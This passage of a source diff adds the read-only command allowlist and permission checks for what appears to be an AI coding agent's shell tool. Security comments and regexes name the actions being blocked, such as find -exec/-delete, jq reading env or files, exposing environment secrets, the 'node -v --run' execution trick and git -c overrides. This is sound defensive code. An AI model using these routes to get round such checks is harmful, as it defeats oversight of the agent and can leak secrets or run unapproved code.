+ }
1128
+ }
1129
+ return false;
1130
+ }
1131
+ },
1132
+ // ss — socket statistics (iproute2). Read-only query tool equivalent to netstat.
1133
+ // SECURITY: -K/--kill (forcibly close sockets) and -D/--diag (dump raw data to file)
1134
+ // are deliberately excluded. -F/--filter (read filter from file) also excluded.
1135
+ ss: {
1136
+ safeFlags: {
1137
+ "-h": "none",
1138
+ "--help": "none",
1139
+ "-V": "none",
1140
+ "--version": "none",
1141
+ "-n": "none",
1142
+ "--numeric": "none",
1143
+ "-r": "none",
1144
+ "--resolve": "none",
1145
+ "-a": "none",
1146
+ "--all": "none",
1147
+ "-l": "none",
1148
+ "--listening": "none",
1149
+ "-o": "none",
1150
+ "--options": "none",
1151
+ "-e": "none",
1152
+ "--extended": "none",
1153
+ "-m": "none",
1154
+ "--memory": "none",
1155
+ "-p": "none",
1156
+ "--processes": "none",
1157
+ "-i": "none",
1158
+ "--info": "none",
1159
+ "-s": "none",
1160
+ "--summary": "none",
1161
+ "-4": "none",
1162
+ "--ipv4": "none",
1163
+ "-6": "none",
1164
+ "--ipv6": "none",
1165
+ "-0": "none",
1166
+ "--packet": "none",
1167
+ "-t": "none",
1168
+ "--tcp": "none",
1169
+ "-M": "none",
1170
+ "--mptcp": "none",
1171
+ "-S": "none",
1172
+ "--sctp": "none",
1173
+ "-u": "none",
1174
+ "--udp": "none",
1175
+ "-d": "none",
1176
+ "--dccp": "none",
1177
+ "-w": "none",
1178
+ "--raw": "none",
1179
+ "-x": "none",
1180
+ "--unix": "none",
1181
+ "--tipc": "none",
1182
+ "--vsock": "none",
1183
+ "-f": "string",
1184
+ "--family": "string",
1185
+ "-A": "string",
1186
+ "--query": "string",
1187
+ "--socket": "string",
1188
+ "-Z": "none",
1189
+ "--context": "none",
1190
+ "-z": "none",
1191
+ "--contexts": "none",
1192
+ // SECURITY: -N/--net EXCLUDED — performs setns(), unshare(), mount(), umount()
1193
+ // to switch network namespace. While isolated to forked process, too invasive.
1194
+ "-b": "none",
1195
+ "--bpf": "none",
1196
+ "-E": "none",
1197
+ "--events": "none",
1198
+ "-H": "none",
1199
+ "--no-header": "none",
1200
+ "-O": "none",
1201
+ "--oneline": "none",
1202
+ "--tipcinfo": "none",
1203
+ "--tos": "none",
1204
+ "--cgroup": "none",
1205
+ "--inet-sockopt": "none"
1206
+ // SECURITY: -K/--kill EXCLUDED — forcibly closes sockets
1207
+ // SECURITY: -D/--diag EXCLUDED — dumps raw TCP data to a file
1208
+ // SECURITY: -F/--filter EXCLUDED — reads filter expressions from a file
1209
+ }
1210
+ },
1211
+ // fd/fdfind — fast file finder (fd-find). Read-only search tool.
1212
+ // SECURITY: -x/--exec (execute command per result) and -X/--exec-batch
1213
+ // (execute command with all results) are deliberately excluded.
1214
+ fd: { safeFlags: { ...FD_SAFE_FLAGS } },
1215
+ // fdfind is the Debian/Ubuntu package name for fd — same binary, same flags
1216
+ fdfind: { safeFlags: { ...FD_SAFE_FLAGS } },
1217
+ ...PYRIGHT_READ_ONLY_COMMANDS,
1218
+ ...DOCKER_READ_ONLY_COMMANDS,
1219
+ ...GH_READ_ONLY_COMMANDS
1220
+ };
1221
+ const ANT_ONLY_COMMAND_ALLOWLIST = {
1222
+ // aki — Anthropic internal knowledge-base search CLI.
1223
+ // Network read-only (same policy as gh). --audit-csv omitted: writes to disk.
1224
+ aki: {
1225
+ safeFlags: {
1226
+ "-h": "none",
1227
+ "--help": "none",
1228
+ "-k": "none",
1229
+ "--keyword": "none",
1230
+ "-s": "none",
1231
+ "--semantic": "none",
1232
+ "--no-adaptive": "none",
1233
+ "-n": "number",
1234
+ "--limit": "number",
1235
+ "-o": "number",
1236
+ "--offset": "number",
1237
+ "--source": "string",
1238
+ "--exclude-source": "string",
1239
+ "-a": "string",
1240
+ "--after": "string",
1241
+ "-b": "string",
1242
+ "--before": "string",
1243
+ "--collection": "string",
1244
+ "--drive": "string",
1245
+ "--folder": "string",
1246
+ "--descendants": "none",
1247
+ "-m": "string",
1248
+ "--meta": "string",
1249
+ "-t": "string",
1250
+ "--threshold": "string",
1251
+ "--kw-weight": "string",
1252
+ "--sem-weight": "string",
1253
+ "-j": "none",
1254
+ "--json": "none",
1255
+ "-c": "none",
1256
+ "--chunk": "none",
1257
+ "--preview": "none",
1258
+ "-d": "none",
1259
+ "--full-doc": "none",
1260
+ "-v": "none",
1261
+ "--verbose": "none",
1262
+ "--stats": "none",
1263
+ "-S": "number",
1264
+ "--summarize": "number",
1265
+ "--explain": "none",
1266
+ "--examine": "string",
1267
+ "--url": "string",
1268
+ "--multi-turn": "number",
1269
+ "--multi-turn-model": "string",
1270
+ "--multi-turn-context": "string",
1271
+ "--no-rerank": "none",
1272
+ "--audit": "none",
1273
+ "--local": "none",
1274
+ "--staging": "none"
1275
+ }
1276
+ }
1277
+ };
1278
+ function getCommandAllowlist() {
1279
+ let allowlist = COMMAND_ALLOWLIST;
1280
+ if (getPlatform() === "windows") {
1281
+ const { xargs: _, ...rest } = allowlist;
1282
+ allowlist = rest;
1283
+ }
1284
+ if (process.env.USER_TYPE === "ant") {
1285
+ return { ...allowlist, ...ANT_ONLY_COMMAND_ALLOWLIST };
1286
+ }
1287
+ return allowlist;
1288
+ }
1289
+ const SAFE_TARGET_COMMANDS_FOR_XARGS = [
1290
+ "echo",
1291
+ // Output only, no dangerous flags
1292
+ "printf",
1293
+ // xargs runs /usr/bin/printf (binary), not bash builtin — no -v support
1294
+ "wc",
1295
+ // Read-only counting, no dangerous flags
1296
+ "grep",
1297
+ // Read-only search, no dangerous flags
1298
+ "head",
1299
+ // Read-only, no dangerous flags
1300
+ "tail"
1301
+ // Read-only (including -f follow), no dangerous flags
1302
+ ];
1303
+ function isCommandSafeViaFlagParsing(command) {
1304
+ const parseResult = tryParseShellCommand(command, (env) => `$${env}`);
1305
+ if (!parseResult.success) return false;
1306
+ const parsed = parseResult.tokens.map((token) => {
1307
+ if (typeof token !== "string") {
1308
+ token = token;
1309
+ if (token.op === "glob") {
1310
+ return token.pattern;
1311
+ }
1312
+ }
1313
+ return token;
1314
+ });
1315
+ const hasOperators = parsed.some((token) => typeof token !== "string");
1316
+ if (hasOperators) {
1317
+ return false;
1318
+ }
1319
+ const tokens = parsed;
1320
+ if (tokens.length === 0) {
1321
+ return false;
1322
+ }
1323
+ let commandConfig;
1324
+ let commandTokens = 0;
1325
+ const allowlist = getCommandAllowlist();
1326
+ for (const [cmdPattern] of Object.entries(allowlist)) {
1327
+ const cmdTokens = cmdPattern.split(" ");
1328
+ if (tokens.length >= cmdTokens.length) {
1329
+ let matches = true;
1330
+ for (let i = 0; i < cmdTokens.length; i++) {
1331
+ if (tokens[i] !== cmdTokens[i]) {
1332
+ matches = false;
1333
+ break;
1334
+ }
1335
+ }
1336
+ if (matches) {
1337
+ commandConfig = allowlist[cmdPattern];
1338
+ commandTokens = cmdTokens.length;
1339
+ break;
1340
+ }
1341
+ }
1342
+ }
1343
+ if (!commandConfig) {
1344
+ return false;
1345
+ }
1346
+ if (tokens[0] === "git" && tokens[1] === "ls-remote") {
1347
+ for (let i = 2; i < tokens.length; i++) {
1348
+ const token = tokens[i];
1349
+ if (token && !token.startsWith("-")) {
1350
+ if (token.includes("://")) {
1351
+ return false;
1352
+ }
1353
+ if (token.includes("@") || token.includes(":")) {
1354
+ return false;
1355
+ }
1356
+ if (token.includes("$")) {
1357
+ return false;
1358
+ }
1359
+ }
1360
+ }
1361
+ }
1362
+ for (let i = commandTokens; i < tokens.length; i++) {
1363
+ const token = tokens[i];
1364
+ if (!token) continue;
1365
+ if (token.includes("$")) {
1366
+ return false;
1367
+ }
1368
+ if (token.includes("{") && (token.includes(",") || token.includes(".."))) {
1369
+ return false;
1370
+ }
1371
+ }
1372
+ if (!validateFlags(tokens, commandTokens, commandConfig, {
1373
+ commandName: tokens[0],
1374
+ rawCommand: command,
1375
+ xargsTargetCommands: tokens[0] === "xargs" ? SAFE_TARGET_COMMANDS_FOR_XARGS : void 0
1376
+ })) {
1377
+ return false;
1378
+ }
1379
+ if (commandConfig.regex && !commandConfig.regex.test(command)) {
1380
+ return false;
1381
+ }
1382
+ if (!commandConfig.regex && /`/.test(command)) {
1383
+ return false;
1384
+ }
1385
+ if (!commandConfig.regex && (tokens[0] === "rg" || tokens[0] === "grep") && /[\n\r]/.test(command)) {
1386
+ return false;
1387
+ }
1388
+ if (commandConfig.additionalCommandIsDangerousCallback && commandConfig.additionalCommandIsDangerousCallback(
1389
+ command,
1390
+ tokens.slice(commandTokens)
1391
+ )) {
1392
+ return false;
1393
+ }
1394
+ return true;
1395
+ }
1396
+ function makeRegexForSafeCommand(command) {
1397
+ return new RegExp(`^${command}(?:\\s|$)[^<>()$\`|{}&;\\n\\r]*$`);
1398
+ }
1399
+ const READONLY_COMMANDS = [
1400
+ // Cross-platform commands from shared validation
1401
+ ...EXTERNAL_READONLY_COMMANDS,
1402
+ // Unix/bash-specific read-only commands (not shared because they don't exist in PowerShell)
1403
+ // Time and date
1404
+ "cal",
1405
+ "uptime",
1406
+ // File content viewing (relative paths handled separately)
1407
+ "cat",
1408
+ "head",
1409
+ "tail",
1410
+ "wc",
1411
+ "stat",
1412
+ "strings",
1413
+ "hexdump",
1414
+ "od",
1415
+ "nl",
1416
+ // System info
1417
+ "id",
1418
+ "uname",
1419
+ "free",
1420
+ "df",
1421
+ "du",
1422
+ "locale",
1423
+ "groups",
1424
+ "nproc",
1425
+ // Path information
1426
+ "basename",
1427
+ "dirname",
1428
+ "realpath",
1429
+ // Text processing
1430
+ "cut",
1431
+ "paste",
1432
+ "tr",
1433
+ "column",
1434
+ "tac",
1435
+ // Reverse cat — displays file contents in reverse line order
1436
+ "rev",
1437
+ // Reverse characters in each line
1438
+ "fold",
1439
+ // Wrap lines to specified width
1440
+ "expand",
1441
+ // Convert tabs to spaces
1442
+ "unexpand",
1443
+ // Convert spaces to tabs
1444
+ "fmt",
1445
+ // Simple text formatter — output to stdout only
1446
+ "comm",
1447
+ // Compare sorted files line by line
1448
+ "cmp",
1449
+ // Byte-by-byte file comparison
1450
+ "numfmt",
1451
+ // Number format conversion
1452
+ // Path information (additional)
1453
+ "readlink",
1454
+ // Resolve symlinks — displays target of symbolic link
1455
+ // File comparison
1456
+ "diff",
1457
+ // true and false, used to silence or create errors
1458
+ "true",
1459
+ "false",
1460
+ // Misc. safe commands
1461
+ "sleep",
1462
+ "which",
1463
+ "type",
1464
+ "expr",
1465
+ // Evaluate expressions (arithmetic, string matching)
1466
+ "test",
1467
+ // Conditional evaluation (file checks, comparisons)
1468
+ "getconf",
1469
+ // Get system configuration values
1470
+ "seq",
1471
+ // Generate number sequences
1472
+ "tsort",
1473
+ // Topological sort
1474
+ "pr"
1475
+ // Paginate files for printing
1476
+ ];
1477
+ const READONLY_COMMAND_REGEXES = /* @__PURE__ */ new Set([
1478
+ // Convert simple commands to regex patterns using makeRegexForSafeCommand
1479
+ ...READONLY_COMMANDS.map(makeRegexForSafeCommand),
1480
+ // Echo that doesn't execute commands or use variables
1481
+ // Allow newlines in single quotes (safe) but not in double quotes (could be dangerous with variable expansion)
1482
+ // Also allow optional 2>&1 stderr redirection at the end
1483
+ /^echo(?:\s+(?:'[^']*'|"[^"$<>\n\r]*"|[^|;&`$(){}><#\\!"'\s]+))*(?:\s+2>&1)?\s*$/,
1484
+ // memCode CLI help
1485
+ /^memcode -h$/,
1486
+ /^memcode --help$/,
1487
+ // Git readonly commands are now handled via COMMAND_ALLOWLIST with explicit flag validation
1488
+ // (git status, git blame, git ls-files, git config --get, git remote, git tag, git branch)
1489
+ /^uniq(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?|-[fsw]\s+\d+))*(?:\s|$)\s*$/,
1490
+ // Only allow flags, no input/output files
1491
+ // System info
1492
+ /^pwd$/,
1493
+ /^whoami$/,
1494
+ // env and printenv removed - could expose sensitive environment variables
1495
+ // Development tools version checking - exact match only, no suffix allowed.
1496
+ // SECURITY: `node -v --run <task>` would execute package.json scripts because
1497
+ // Node processes --run before -v. Python/python3 --version are also anchored
1498
+ // for defense-in-depth. These were previously in EXTERNAL_READONLY_COMMANDS which
1499
+ // flows through makeRegexForSafeCommand and permits arbitrary suffixes.
1500
+ /^node -v$/,
1501
+ /^node --version$/,
1502
+ /^python --version$/,
1503
+ /^python3 --version$/,
1504
+ // Misc. safe commands
1505
+ // tree command moved to COMMAND_ALLOWLIST for proper flag validation (blocks -o/--output)
1506
+ /^history(?:\s+\d+)?\s*$/,
1507
+ // Only allow bare history or history with numeric argument - prevents file writing
1508
+ /^alias$/,
1509
+ /^arch(?:\s+(?:--help|-h))?\s*$/,
1510
+ // Only allow arch with help flags or no arguments
1511
+ // Network commands - only allow exact commands with no arguments to prevent network manipulation
1512
+ /^ip addr$/,
1513
+ // Only allow "ip addr" with no additional arguments
1514
+ /^ifconfig(?:\s+[a-zA-Z][a-zA-Z0-9_-]*)?\s*$/,
1515
+ // Allow ifconfig with interface name only (must start with letter)
1516
+ // JSON processing with jq - allow with inline filters and file arguments
1517
+ // File arguments are validated separately by pathValidation.ts
1518
+ // Allow pipes and complex expressions within quotes but prevent dangerous flags
1519
+ // Block command substitution - backticks are dangerous even in single quotes for jq
1520
+ // Block -f/--from-file, --rawfile, --slurpfile (read files into jq), --run-tests, -L/--library-path (load executable modules)
1521
+ // Block 'env' builtin and '$ENV' object which can access environment variables (defense in depth)
1522
+ /^jq(?!\s+.*(?:-f\b|--from-file|--rawfile|--slurpfile|--run-tests|-L\b|--library-path|\benv\b|\$ENV\b))(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?))*(?:\s+'[^'`]*'|\s+"[^"`]*"|\s+[^-\s'"][^\s]*)+\s*$/,
1523
+ // Path commands (path validation ensures they're allowed)
1524
+ // cd command - allows changing to directories
1525
+ /^cd(?:\s+(?:'[^']*'|"[^"]*"|[^\s;|&`$(){}><#\\]+))?$/,
1526
+ // ls command - allows listing directories
1527
+ /^ls(?:\s+[^<>()$`|{}&;\n\r]*)?$/,
1528
+ // find command - blocks dangerous flags
1529
+ // Allow escaped parentheses \( and \) for grouping, but block unescaped ones
1530
+ // NOTE: \\[()] must come BEFORE the character class to ensure \( is matched as an escaped paren,
1531
+ // not as backslash + paren (which would fail since paren is excluded from the character class)
1532
+ /^find(?:\s+(?:\\[()]|(?!-delete\b|-exec\b|-execdir\b|-ok\b|-okdir\b|-fprint0?\b|-fls\b|-fprintf\b)[^<>()$`|{}&;\n\r\s]|\s)+)?$/
1533
+ ]);
1534
+ function containsUnquotedExpansion(command) {
1535
+ let inSingleQuote = false;
1536
+ let inDoubleQuote = false;
1537
+ let escaped = false;
1538
+ for (let i = 0; i < command.length; i++) {
1539
+ const currentChar = command[i];
1540
+ if (escaped) {
1541
+ escaped = false;
1542
+ continue;
1543
+ }
1544
+ if (currentChar === "\\" && !inSingleQuote) {
1545
+ escaped = true;
1546
+ continue;
1547
+ }
1548
+ if (currentChar === "'" && !inDoubleQuote) {
1549
+ inSingleQuote = !inSingleQuote;
1550
+ continue;
1551
+ }
1552
+ if (currentChar === '"' && !inSingleQuote) {
1553
+ inDoubleQuote = !inDoubleQuote;
1554
+ continue;
1555
+ }
1556
+ if (inSingleQuote) {
1557
+ continue;
1558
+ }
1559
+ if (currentChar === "$") {
1560
+ const next = command[i + 1];
1561
+ if (next && /[A-Za-z_@*#?!$0-9-]/.test(next)) {
1562
+ return true;
1563
+ }
1564
+ }
1565
+ if (inDoubleQuote) {
1566
+ continue;
1567
+ }
1568
+ if (currentChar && /[?*[\]]/.test(currentChar)) {
1569
+ return true;
1570
+ }
1571
+ }
1572
+ return false;
1573
+ }
1574
+ function isCommandReadOnly(command) {
1575
+ let testCommand = command.trim();
1576
+ if (testCommand.endsWith(" 2>&1")) {
1577
+ testCommand = testCommand.slice(0, -5).trim();
1578
+ }
1579
+ if (containsVulnerableUncPath(testCommand)) {
1580
+ return false;
1581
+ }
1582
+ if (containsUnquotedExpansion(testCommand)) {
1583
+ return false;
1584
+ }
1585
+ if (isCommandSafeViaFlagParsing(testCommand)) {
1586
+ return true;
1587
+ }
1588
+ for (const regex of READONLY_COMMAND_REGEXES) {
1589
+ if (regex.test(testCommand)) {
1590
+ if (testCommand.includes("git") && /\s-c[\s=]/.test(testCommand)) {
1591
+ return false;
1592
+ }
1593
+ if (testCommand.includes("git") && /\s--exec-path[\s=]/.test(testCommand)) {
1594
+ return false;
1595
+ }
1596
+ if (testCommand.includes("git") && /\s--config-env[\s=]/.test(testCommand)) {
1597
+ return false;
1598
+ }
1599
+ return true;
1600
+ }
1601
+ }
1602
+ return false;
1603
+ }
1604
+ function commandHasAnyGit(command) {
1605
+ return splitCommand_DEPRECATED(command).some(
1606
+ (subcmd) => isNormalizedGitCommand(subcmd.trim())
1607
+ );
1608
+ }
1609
+ const GIT_INTERNAL_PATTERNS = [
1610
+ /^HEAD$/,
1611
+ /^objects(?:\/|$)/,
1612
+ /^refs(?:\/|$)/,
1613
+ /^hooks(?:\/|$)/
1614
+ ];
1615
+ function isGitInternalPath(path) {
1616
+ const normalized = path.replace(/^\.?\//, "");
1617
+ return GIT_INTERNAL_PATTERNS.some((pattern) => pattern.test(normalized));
1618
+ }
1619
+ const NON_CREATING_WRITE_COMMANDS = /* @__PURE__ */ new Set(["rm", "rmdir", "sed"]);
1620
+ function extractWritePathsFromSubcommand(subcommand) {
1621
+ const parseResult = tryParseShellCommand(subcommand, (env) => `$${env}`);
1622
+ if (!parseResult.success) return [];
1623
+ const tokens = parseResult.tokens.filter(
1624
+ (t) => typeof t === "string"
1625
+ );
1626
+ if (tokens.length === 0) return [];
1627
+ const baseCmd = tokens[0];
1628
+ if (!baseCmd) return [];
1629
+ if (!(baseCmd in COMMAND_OPERATION_TYPE)) {
1630
+ return [];
1631
+ }
1632
+ const opType = COMMAND_OPERATION_TYPE[baseCmd];
1633
+ if (opType !== "write" && opType !== "create" || NON_CREATING_WRITE_COMMANDS.has(baseCmd)) {
1634
+ return [];
1635
+ }
1636
+ const extractor = PATH_EXTRACTORS[baseCmd];
1637
+ if (!extractor) return [];
1638
+ return extractor(tokens.slice(1));
1639
+ }
1640
+ function commandWritesToGitInternalPaths(command) {
1641
+ const subcommands = splitCommand_DEPRECATED(command);
1642
+ for (const subcmd of subcommands) {
1643
+ const trimmed = subcmd.trim();
1644
+ const writePaths = extractWritePathsFromSubcommand(trimmed);
1645
+ for (const path of writePaths) {
1646
+ if (isGitInternalPath(path)) {
1647
+ return true;
1648
+ }
1649
+ }
1650
+ const { redirections } = extractOutputRedirections(trimmed);
1651
+ for (const { target } of redirections) {
1652
+ if (isGitInternalPath(target)) {
1653
+ return true;
1654
+ }
1655
+ }
1656
+ }
1657
+ return false;
1658
+ }
1659
+ function checkReadOnlyConstraints(input, compoundCommandHasCd) {
1660
+ const { command } = input;
1661
+ const result = tryParseShellCommand(command, (env) => `$${env}`);
1662
+ if (!result.success) {
1663
+ return {
1664
+ behavior: "passthrough",
1665
+ message: "Command cannot be parsed, requires further permission checks"
1666
+ };
1667
+ }
1668
+ if (bashCommandIsSafe_DEPRECATED(command).behavior !== "passthrough") {
1669
+ return {
1670
+ behavior: "passthrough",
1671
+ message: "Command is not read-only, requires further permission checks"
1672
+ };
1673
+ }
1674
+ if (containsVulnerableUncPath(command)) {
1675
+ return {
1676
+ behavior: "ask",
1677
+ message: "Command contains Windows UNC path that could be vulnerable to WebDAV attacks"
1678
+ };
1679
+ }
1680
+ const hasGitCommand = commandHasAnyGit(command);
1681
+ if (compoundCommandHasCd && hasGitCommand) {
1682
+ return {
1683
+ behavior: "passthrough",
1684
+ message: "Compound commands with cd and git require permission checks for enhanced security"
1685
+ };
1686
+ }
1687
+ if (hasGitCommand && isCurrentDirectoryBareGitRepo()) {
1688
+ return {
1689
+ behavior: "passthrough",
1690
+ message: "Git commands in directories with bare repository structure require permission checks for enhanced security"
1691
+ };
1692
+ }
1693
+ if (hasGitCommand && commandWritesToGitInternalPaths(command)) {
1694
+ return {
1695
+ behavior: "passthrough",
1696
+ message: "Compound commands that create git internal files and run git require permission checks for enhanced security"
1697
+ };
1698
+ }
1699
+ if (hasGitCommand && SandboxManager.isSandboxingEnabled() && getCwd() !== getOriginalCwd()) {
1700
+ return {
1701
+ behavior: "passthrough",
1702
+ message: "Git commands outside the original working directory require permission checks when sandbox is enabled"
1703
+ };
1704
+ }
1705
+ const allSubcommandsReadOnly = splitCommand_DEPRECATED(command).every(
1706
+ (subcmd) => {
1707
+ if (bashCommandIsSafe_DEPRECATED(subcmd).behavior !== "passthrough") {
1708
+ return false;
1709
+ }
1710
+ return isCommandReadOnly(subcmd);
1711
+ }
1712
+ );
1713
+ if (allSubcommandsReadOnly) {
1714
+ return {
1715
+ behavior: "allow",
1716
+ updatedInput: input
1717
+ };
1718
+ }
1719
+ return {
1720
+ behavior: "passthrough",
1721
+ message: "Command is not read-only, requires further permission checks"
1722
+ };
1723
+ }
1724
+ export {
1725
+ checkReadOnlyConstraints,
1726
+ isCommandSafeViaFlagParsing
1727
+ };